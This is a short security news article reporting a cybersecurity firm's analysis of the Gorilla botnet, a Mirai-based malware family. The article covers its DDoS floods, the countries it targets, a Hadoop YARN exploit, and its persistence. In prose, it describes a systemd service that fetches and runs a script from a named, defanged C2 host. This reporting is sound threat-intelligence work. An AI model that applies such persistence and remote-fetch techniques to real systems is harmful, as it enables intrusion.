Cybersecurity experts have identified a new family of botnet malware known as Gorilla (or GorillaBot), which is based on the leaked source code of the Mirai botnet.
NSFOCUS, a cybersecurity firm that detected the botnet's activity last month, reported that it executed over 300,000 attack commands with alarming frequency between September 4 and September 27, 2024. On average, the botnet launched no fewer than 20,000 commands each day aimed at carrying out distributed denial-of-service (DDoS) attacks.
The Gorilla botnet has targeted more than 100 countries, including universities, government websites, telecommunications, banking, gaming, and gambling sectors, with China, the U.S., Canada, and Germany being the most affected nations.
According to NSFOCUS, Gorilla employs various methods for its DDoS attacks, including UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood. The connectionless nature of the UDP protocol facilitates arbitrary source IP spoofing, allowing the generation of significant traffic.
The botnet is compatible with multiple CPU architectures such as ARM, MIPS, x86_64, and x86, and can connect to one of five predefined command-and-control (C2) servers to receive DDoS commands.
Interestingly, the malware also contains functions that exploit a vulnerability in Apache Hadoop YARN RPC to enable remote code execution. This vulnerability has been exploited in the wild since at least 2021, as reported by Alibaba Cloud and Trend Micro.
To maintain persistence on infected hosts, Gorilla creates a service file named custom.service in the "/etc/systemd/system/" directory, ensuring it runs automatically at system startup. This service downloads and executes a shell script ("lol.sh") from a remote server ("pen.gorillafirewall[.]su"). Additionally, similar commands are incorporated into "/etc/inittab," "/etc/profile," and "/boot/bootcmd" files to facilitate script execution during system startup or user login.
NSFOCUS noted that Gorilla employs various DDoS attack techniques and utilizes encryption algorithms similar to those used by the Keksec group to conceal sensitive information, demonstrating a high level of counter-detection awareness as it seeks to maintain long-term control over IoT devices and cloud hosts.
Credit:TheHackerNews.